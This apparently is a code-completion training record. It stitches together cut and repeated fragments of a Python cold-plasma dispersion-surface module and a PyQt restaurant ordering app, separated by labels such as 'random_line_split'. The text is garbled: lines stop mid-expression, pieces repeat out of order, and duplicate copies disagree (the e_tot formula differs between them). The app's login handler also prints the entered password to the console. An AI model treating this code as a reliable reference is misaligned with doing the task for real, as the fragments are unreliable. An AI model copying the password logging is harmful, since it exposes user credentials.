pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final **
|
_calc_continuity
|
identifier_name
|
disp_surf_calc.py
|
* np.conj(e_x) + e_y * np.conj(e_y))
e_tot = np.sqrt(e_x * np.conj(e_x) + e_y * np.conj(e_y) + e_z ** 2)
e_pol = -2 * np.imag(e_x * np.conj(e_y)) / e_per ** 2
return e_x, e_y, e_z, e_per, e_tot, e_pol
def _calc_b(kc_x_mat, kc_z_mat, w_final, e_x, e_y, e_z):
b_x = -kc_z_mat * e_y / w_final
b_y = (kc_z_mat * e_x - kc_x_mat * e_z) / w_final
b_z = kc_x_mat * e_y / w_final
b_par = np.sqrt(b_z * np.conj(b_z))
b_per = np.sqrt(b_x * np.conj(b_x) + b_y * np.conj(b_y))
b_pol = -2 * np.imag(b_x * np.conj(b_y)) / b_per ** 2
b_tot = np.sqrt(
b_x * np.conj(b_x) + b_y * np.conj(b_y) + b_z * np.conj(b_z))
return b_x, b_y, b_z, b_par, b_per, b_pol, b_tot
def _calc_s(e_x, e_y, e_z, b_x, b_y, b_z):
|
s_y = e_z * np.conj(b_x) - e_x * np.conj(b_z)
s_z = e_x * np.conj(b_y) - e_y * np.conj(b_x)
s_par = np.abs(s_z)
s_tot = np.sqrt(s_x * np.conj(s_x) + s_y * np.conj(s_y)
+ s_z * np.conj(s_z))
return s_par, s_tot
def _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot):
n_e = wp_e ** 2
en_e_n = en_e * n_e
en_i_n = en_i * n_e
en_efield = 0.5 * e_tot ** 2
en_bfield = 0.5 * b_tot ** 2
ratio_part_field = (en_e_n + en_i_n) / (en_efield + en_bfield)
return ratio_part_field
def _calc_continuity(kc_x_mat, kc_z_mat, w_final, v_ex, v_ez, v_ix, v_iz):
dn_e_n = (kc_x_mat * v_ex + kc_z_mat * v_ez) / w_final
dn_e_n = np.sqrt(dn_e_n * np.conj(dn_e_n))
dn_i_n = (kc_x_mat * v_ix + kc_z_mat * v_iz) / w_final
dn_i_n = np.sqrt(dn_i_n * np.conj(dn_i_n))
dne_dni = dn_e_n / dn_i_n
return dn_e_n, dn_i_n, dne_dni
def _calc_vei(m_i, wc_i, w_final, e_x, e_y, e_z):
q_e, q_i, m_e, wc_e = [-1, 1, 1, 1]
v_ex = 1j * q_e * (w_final * e_x - 1j * wc_e * e_y)
v_ex /= m_e * (w_final ** 2 - wc_e ** 2)
v_ey = 1j * q_e * (1j * wc_e * e_x + w_final * e_y)
v_ey /= m_e * (w_final ** 2 - wc_e ** 2)
v_ez = 1j * q_e * e_z / (m_e * w_final)
v_ix = 1j * q_i * (w_final * e_x + 1j * wc_i * e_y)
v_ix /= m_i * (w_final ** 2 - wc_i ** 2)
v_iy = 1j * q_i * (-1j * wc_i * e_x + w_final * e_y)
v_iy /= m_i * (w_final ** 2 - wc_i ** 2)
v_iz = 1j * q_i * e_z / (m_i * w_final)
return v_ex, v_ey, v_ez, v_ix, v_iy, v_iz
def disp_surf_calc(kc_x_max, kc_z_max, m_i, wp_e):
r"""Calculate the cold plasma dispersion surfaces according to equation
2.64 in Plasma Waves by Swanson (2nd ed.)
Parameters
----------
kc_x_max : float
Max value of k_perpendicular*c/w_c.
kc_z_max : float
Max value of k_parallel*c/w_c.
m_i : float
Ion mass in terms of electron masses.
wp_e : float
Electron plasma frequency in terms of electron gyro frequency.
Returns
-------
kx_ : ndarray
k_perpendicular*c/w_c meshgrid
kz_ : ndarray
k_parallel*c/w_c meshgrid
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final
|
# Poynting flux
s_x = e_y * np.conj(b_z) - e_z * np.conj(b_y)
|
random_line_split
|
disp_surf_calc.py
|
* np.conj(e_x) + e_y * np.conj(e_y))
e_tot = np.sqrt(e_x * np.conj(e_x) + e_y * np.conj(e_y) + e_z * np.conj(e_z))
e_pol = -2 * np.imag(e_x * np.conj(e_y)) / e_per ** 2
return e_x, e_y, e_z, e_per, e_tot, e_pol
def _calc_b(kc_x_mat, kc_z_mat, w_final, e_x, e_y, e_z):
b_x = -kc_z_mat * e_y / w_final
b_y = (kc_z_mat * e_x - kc_x_mat * e_z) / w_final
b_z = kc_x_mat * e_y / w_final
b_par = np.sqrt(b_z * np.conj(b_z))
b_per = np.sqrt(b_x * np.conj(b_x) + b_y * np.conj(b_y))
b_pol = -2 * np.imag(b_x * np.conj(b_y)) / b_per ** 2
b_tot = np.sqrt(
b_x * np.conj(b_x) + b_y * np.conj(b_y) + b_z * np.conj(b_z))
return b_x, b_y, b_z, b_par, b_per, b_pol, b_tot
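# Aside (not part of disp_surf_calc.py): in these normalized units _calc_b is just
# Faraday's law, B = (k x E) / w with k = (kc_x, 0, kc_z).  The quick self-check below
# compares the component formulas against numpy.cross for one random complex field;
# the helper name _check_calc_b and the scalar inputs are illustrative assumptions.
def _check_calc_b():
    rng = np.random.default_rng(0)
    kc_x, kc_z, w = rng.uniform(0.1, 5.0, 3)
    e_vec = rng.normal(size=3) + 1j * rng.normal(size=3)   # (e_x, e_y, e_z)
    b_cross = np.cross(np.array([kc_x, 0.0, kc_z]), e_vec) / w
    b_x = -kc_z * e_vec[1] / w
    b_y = (kc_z * e_vec[0] - kc_x * e_vec[2]) / w
    b_z = kc_x * e_vec[1] / w
    assert np.allclose(b_cross, [b_x, b_y, b_z])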
def _calc_s(e_x, e_y, e_z, b_x, b_y, b_z):
# Poynting flux
s_x = e_y * np.conj(b_z) - e_z * np.conj(b_y)
s_y = e_z * np.conj(b_x) - e_x * np.conj(b_z)
s_z = e_x * np.conj(b_y) - e_y * np.conj(b_x)
s_par = np.abs(s_z)
s_tot = np.sqrt(s_x * np.conj(s_x) + s_y * np.conj(s_y)
+ s_z * np.conj(s_z))
return s_par, s_tot
def _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot):
n_e = wp_e ** 2
en_e_n = en_e * n_e
en_i_n = en_i * n_e
en_efield = 0.5 * e_tot ** 2
en_bfield = 0.5 * b_tot ** 2
ratio_part_field = (en_e_n + en_i_n) / (en_efield + en_bfield)
return ratio_part_field
def _calc_continuity(kc_x_mat, kc_z_mat, w_final, v_ex, v_ez, v_ix, v_iz):
dn_e_n = (kc_x_mat * v_ex + kc_z_mat * v_ez) / w_final
dn_e_n = np.sqrt(dn_e_n * np.conj(dn_e_n))
dn_i_n = (kc_x_mat * v_ix + kc_z_mat * v_iz) / w_final
dn_i_n = np.sqrt(dn_i_n * np.conj(dn_i_n))
dne_dni = dn_e_n / dn_i_n
return dn_e_n, dn_i_n, dne_dni
def _calc_vei(m_i, wc_i, w_final, e_x, e_y, e_z):
q_e, q_i, m_e, wc_e = [-1, 1, 1, 1]
v_ex = 1j * q_e * (w_final * e_x - 1j * wc_e * e_y)
v_ex /= m_e * (w_final ** 2 - wc_e ** 2)
v_ey = 1j * q_e * (1j * wc_e * e_x + w_final * e_y)
v_ey /= m_e * (w_final ** 2 - wc_e ** 2)
v_ez = 1j * q_e * e_z / (m_e * w_final)
v_ix = 1j * q_i * (w_final * e_x + 1j * wc_i * e_y)
v_ix /= m_i * (w_final ** 2 - wc_i ** 2)
v_iy = 1j * q_i * (-1j * wc_i * e_x + w_final * e_y)
v_iy /= m_i * (w_final ** 2 - wc_i ** 2)
v_iz = 1j * q_i * e_z / (m_i * w_final)
return v_ex, v_ey, v_ez, v_ix, v_iy, v_iz
def disp_surf_calc(kc_x_max, kc_z_max, m_i, wp_e):
|
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final **
|
r"""Calculate the cold plasma dispersion surfaces according to equation
2.64 in Plasma Waves by Swanson (2nd ed.)
Parameters
----------
kc_x_max : float
Max value of k_perpendicular*c/w_c.
kc_z_max : float
Max value of k_parallel*c/w_c.
m_i : float
Ion mass in terms of electron masses.
wp_e : float
Electron plasma frequency in terms of electron gyro frequency.
Returns
-------
kx_ : ndarray
k_perpendicular*c/w_c meshgrid
kz_ : ndarray
k_parallel*c/w_c meshgrid
|
identifier_body
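# Illustrative sketch (not from the original file): the block above turns the cold
# plasma dispersion relation into a degree-10 polynomial in w and hands it to np.roots
# for every (k_perp, k_par).  For a single k the same idea reduces to the helper below;
# the example coefficients are placeholders, not the real pol_koeff_* values.
def solve_single_k(c8, c6, c4, c2, c0):
    # w**10 + c8*w**8 + c6*w**6 + c4*w**4 + c2*w**2 + c0 = 0; odd powers are absent
    # because the relation only involves w**2.
    coeffs = [1, 0, c8, 0, c6, 0, c4, 0, c2, 0, c0]
    w_roots = np.real(np.roots(coeffs))   # roots should be real (A. Tjulin)
    return np.sort(w_roots)               # sorted so the surfaces stack nicely
# e.g. solve_single_k(-5.0, 8.0, -4.0, 1.0, -0.01) returns the 10 sorted branches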
|
disp_surf_calc.py
|
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final ** 2
v_ph_c = np.sqrt(1. / n2_)
va_c = 1 / (wp_e * np.sqrt(m_i))
v_ph_va = v_ph_c / va_c
diel_tensor = _calc_diel(kc_, w_final, theta_, wp_e, wp_i, wc_i)
e_x, e_y, e_z, e_per, e_tot, e_pol = _calc_e(diel_tensor)
e_par = (kc_x_mat * e_x + kc_z_mat * e_z) / kc_
b_x, b_y, b_z, b_par, b_per, b_pol, b_tot = _calc_b(kc_x_mat, kc_z_mat,
w_final, e_x, e_y, e_z)
dk_x, dk_z = [kc_x_mat[1], kc_z_mat[1]]
dw_x, dw_z = [np.zeros(w_final.shape) for _ in range(2)]
dw_x[:, :, 1:] = np.diff(w_final, axis=2)
dw_z[:, 1:, :] = np.diff(w_final, axis=1)
v_x, v_z = [dw_ / dk for dw_, dk in zip([dw_x, dw_z], [dk_x, dk_z])]
s_par, s_tot = _calc_s(e_x, e_y, e_z, b_x, b_y, b_z)
# Compute ion and electron velocities
v_ex, v_ey, v_ez, v_ix, v_iy, v_iz = _calc_vei(m_i, wc_i, w_final,
e_x, e_y, e_z)
# Ratio of parallel and perpendicular to B speed
vepar_perp = v_ez * np.conj(v_ez)
vepar_perp /= (v_ex * np.conj(v_ex) + v_ey * np.conj(v_ey))
vipar_perp = v_iz * np.conj(v_iz)
vipar_perp /= (v_ix * np.conj(v_ix) + v_iy * np.conj(v_iy))
# Total particle speeds
v_e2 = v_ex * np.conj(v_ex) + v_ey * np.conj(v_ey) + v_ez * np.conj(v_ez)
v_i2 = v_ix * np.conj(v_ix) + v_iy * np.conj(v_iy) + v_iz * np.conj(v_iz)
# Ion and electron energies
m_e = -1
en_e = 0.5 * m_e * v_e2
en_i = 0.5 * m_i * v_i2
# Ratio of particle and field energy densities
ratio_part_field = _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot)
# Continuity equation
dn_e_n, dn_i_n, dne_dni = _calc_continuity(kc_x_mat, kc_z_mat, w_final,
v_ex, v_ez, v_ix, v_iz)
dn_e_n_db_b = dn_e_n / b_tot
dn_i_n_db_b = dn_i_n / b_tot
dn_e_n_dbpar_b = dn_e_n / b_par
dn_i_n_dbpar_b = dn_i_n / b_par
dn_e = dn_e_n * wp_e ** 2
k_dot_e = e_x * kc_x_mat + e_z * kc_z_mat
k_dot_e = np.sqrt(k_dot_e * np.conj(k_dot_e))
# Build output dict
extra_param = {"Degree of electromagnetism": np.log10(b_tot / e_tot),
"Degree of longitudinality": np.abs(e_par) / e_tot,
"Degree of parallelity E": e_z / e_tot,
"Degree of parallelity B": np.sqrt(
b_z * np.conj(b_z)) / b_tot,
"Ellipticity E": e_pol, "Ellipticity B": b_pol,
"E_part/E_field": np.log10(ratio_part_field),
"v_g": np.sqrt(v_x ** 2 + v_z ** 2),
"v_ph/v_a": np.log10(v_ph_va),
"E_e/E_i": np.log10(en_e / en_i),
"v_e/v_i": np.log10(np.sqrt(v_e2 / v_i2)),
"v_epara/v_eperp": np.log10(vepar_perp),
"v_ipara/v_iperp": np.log10(vipar_perp),
"dn_e/dn_i": np.log10(dne_dni),
"(dn_e/n)/ (dB/B)": np.log10(dn_e_n_db_b),
"(dn_i/n)/(dB/B)": np.log10(dn_i_n_db_b),
"(dn_i/n)/(dBpar/B)": np.log10(dn_i_n_dbpar_b),
"(dn_e/n)/(dB/B)": np.log10(dn_e / k_dot_e),
"(dn_e/n)/(dBpar /B)": np.log10(dn_e_n_dbpar_b),
" Spar/Stot": s_par / s_tot}
for k, v in extra_param.items():
|
extra_param[k] = np.transpose(np.real(v), [0, 2, 1])
|
conditional_block
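# Hedged usage sketch (not part of disp_surf_calc.py): assuming the function returns
# the kx_, kz_, wf_, extra_param documented in its docstring, one plausible way to
# drive it and look at the lowest dispersion surface is shown below.  The argument
# values and plotting choices are illustrative assumptions only.
if __name__ == "__main__":
    import matplotlib.pyplot as plt
    kx_, kz_, wf_, extra_param = disp_surf_calc(kc_x_max=10., kc_z_max=10.,
                                                m_i=100., wp_e=2.)
    plt.pcolormesh(kx_, kz_, wf_[0], shading="auto")   # lowest of the 10 surfaces
    plt.xlabel("k_perp c / w_ce")
    plt.ylabel("k_par c / w_ce")
    plt.colorbar(label="w / w_ce")
    plt.show()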
|
|
app.py
|
self.checkOutBtn = QtWidgets.QPushButton(self.itemBox)
self.checkOutBtn.setGeometry(QtCore.QRect(290, 140, 75, 23))
self.checkOutBtn.setObjectName("checkOutBtn")
self.checkOutBtn.clicked.connect(self.checkOutFunction)
self.noteBtn = QtWidgets.QPushButton(self.itemBox)
self.noteBtn.setGeometry(QtCore.QRect(290, 80, 75, 23))
self.noteBtn.setObjectName("noteBtn")
self.noteBtn.setEnabled(False)
self.addItemBtn = QtWidgets.QPushButton(self.itemBox)
self.addItemBtn.setGeometry(QtCore.QRect(290, 50, 75, 23))
self.addItemBtn.setObjectName("addItemBtn")
self.addItemBtn.clicked.connect(self.addItemFunction)
self.tableList = [i for i in range(21)]
self.tableDrop = QtWidgets.QComboBox(self.itemBox)
self.tableDrop.setGeometry(QtCore.QRect(200, 20, 69, 22))
self.tableDrop.setObjectName("tableDrop")
for table in self.tableList:
self.tableDrop.addItem(str(table))
self.itemDataBase[str(table)] = ["Table Number "+str(table)]
self.tableDrop.activated.connect(self.loadTableItem)
self.tableNoLbl = QtWidgets.QLabel(self.itemBox)
self.tableNoLbl.setGeometry(QtCore.QRect(120, 10, 131, 41))
self.tableNoLbl.setObjectName("tableNoLbl")
self.addTable = QtWidgets.QPushButton(self.itemBox)
self.addTable.setGeometry(QtCore.QRect(10, 20, 75, 23))
self.addTable.setObjectName("AddTable")
self.addTable.clicked.connect(self.addTableFunction)
self.addTable.setEnabled(False)
self.showItem = QtWidgets.QTextEdit(self.itemBox)
self.showItem.setGeometry(QtCore.QRect(10, 50, 261, 231))
self.showItem.setObjectName("showItem")
self.showItem.setReadOnly(True)
self.orderButton = QtWidgets.QPushButton(self.itemBox)
self.orderButton.setGeometry(QtCore.QRect(290, 110, 75, 23))
self.orderButton.setObjectName("orderButton")
self.orderButton.clicked.connect(self.orderFunction)
self.orderButton.setEnabled(False)
self.loadBackupFile = QtWidgets.QPushButton(self.itemBox)
self.loadBackupFile.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loadBackupFile.setObjectName("loadBackupFile")
self.loadBackupFile.clicked.connect(self.loadBackupFunction)
self.loadBackupFile.setEnabled(False)
self.loginBox = QtWidgets.QGroupBox(Dialog)
self.loginBox.setGeometry(QtCore.QRect(10, 10, 381, 81))
self.loginBox.setObjectName("loginBox")
self.userLbl = QtWidgets.QLabel(self.loginBox)
self.userLbl.setGeometry(QtCore.QRect(10, 20, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.userLbl.setFont(font)
self.userLbl.setObjectName("userLbl")
self.inputUser = QtWidgets.QLineEdit(self.loginBox)
self.inputUser.setGeometry(QtCore.QRect(70, 20, 201, 21))
self.inputUser.setObjectName("inputUser")
self.loginBtn = QtWidgets.QPushButton(self.loginBox)
self.loginBtn.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loginBtn.setObjectName("loginBtn")
self.loginBtn.clicked.connect(self.loginFunction)
self.inputPwd = QtWidgets.QLineEdit(self.loginBox)
self.inputPwd.setGeometry(QtCore.QRect(70, 50, 201, 21))
self.inputPwd.setObjectName("inputPwd")
self.inputPwd.setEchoMode(QtWidgets.QLineEdit.Password)
|
self.passLbl = QtWidgets.QLabel(self.loginBox)
self.passLbl.setGeometry(QtCore.QRect(10, 50, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.passLbl.setFont(font)
self.passLbl.setObjectName("passLbl")
self.msgWrong = QMessageBox()
self.msgWrong.setWindowTitle("Login Check")
self.msgWrong.setText("Wrong user/password!")
self.msgWrong.setIcon(QMessageBox.Critical)
self.msgCorrect = QMessageBox()
self.msgCorrect.setWindowTitle("Login Check")
self.msgCorrect.setText(" Login Successful!")
self.msgCorrect.setIcon(QMessageBox.Information)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.removeOldBackupFile()
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.itemBox.setTitle(_translate("Dialog", "GroupBox"))
self.checkOutBtn.setText(_translate("Dialog", "Check out"))
self.noteBtn.setText(_translate("Dialog", "Note"))
self.addItemBtn.setText(_translate("Dialog", "Add Items"))
self.tableDrop.setItemText(0, _translate("Dialog", "1"))
self.tableDrop.setItemText(1, _translate("Dialog", "2"))
self.tableDrop.setItemText(2, _translate("Dialog", "3"))
self.tableNoLbl.setText(_translate("Dialog", "Table Number"))
self.showItem.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.addTable.setText(_translate("Dialog", "Add Table"))
self.loginBox.setTitle(_translate("Dialog", "GroupBox"))
self.userLbl.setText(_translate("Dialog", "User:"))
self.loginBtn.setText(_translate("Dialog", "Login"))
self.passLbl.setText(_translate("Dialog", "Pass:"))
self.orderButton.setText(_translate("Dialog", "Order"))
self.loadBackupFile.setText(_translate("Dialog", "Load Backup"))
def addItemFunction(self):
self.addItemWindow = Ui_MainWindow()
self.itemWindow = QtWidgets.QMainWindow()
self.addItemWindow.setupUi(self.itemWindow)
self.itemWindow.setWindowIcon(QtGui.QIcon('sushi.jpg'))
self.buttonBox = QtWidgets.QDialogButtonBox(self.addItemWindow.centralwidget)
self.buttonBox.setGeometry(QtCore.QRect(620, 560, 251, 41))
font = QtGui.QFont()
font.setPointSize(12)
self.buttonBox.setFont(font)
self.buttonBox.setToolTipDuration(4)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.accepted.connect(self.okButtonClick)
self.buttonBox.rejected.connect(self.cancelButtonClick)
self.buttonBox.setObjectName("buttonBox")
self.itemWindow.show()
def okButtonClick(self):
for item in self.addItemWindow.spinBoxList:
if(str(item.value())!= "0"):
printOut = str(item.value())+" x "+item.objectName()
self.itemDataBase[self.tableDrop.currentText()].append(printOut)
#self.showItem.append(printOut)
self.itemWindow.close()
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item.split(".")[0])
self.writeBackupFile()
def cancelButtonClick(self):
self.itemWindow.close()
def addTableFunction(self):
currentKeyNumber = len(self.itemDataBase.keys())
self.tableDrop.addItem(str(currentKeyNumber))
self.itemDataBase[str(currentKeyNumber)] = ["Table Number "+str(currentKeyNumber)]
def loadTableItem(self):
self.showItem.clear()
for item in self.itemDataBase[self.tableDrop.currentText()]:
self.showItem.append(item)
def loginFunction(self):
try:
user = self.inputUser.text()
print("user : " + user)
pwd = self.inputPwd.text()
print("pwd : " + pwd)
except:
print("Missing Input!")
self.msgWrong.exec_()
pass
try:
if(self.loginDatabase[user] == pwd):
print("Login Successful!")
self.msgCorrect.exec_()
self.adminRight = True
self.loadBackupFile.setEnabled(True)
self.addTable.setEnabled(True)
else:
self.msgWrong.exec_()
except:
print("Wrong password! ")
self.msgWrong.exec_()
def writeBackupFile(self):
timestr = time.strftime("%Y%m%d-%H%M%S")
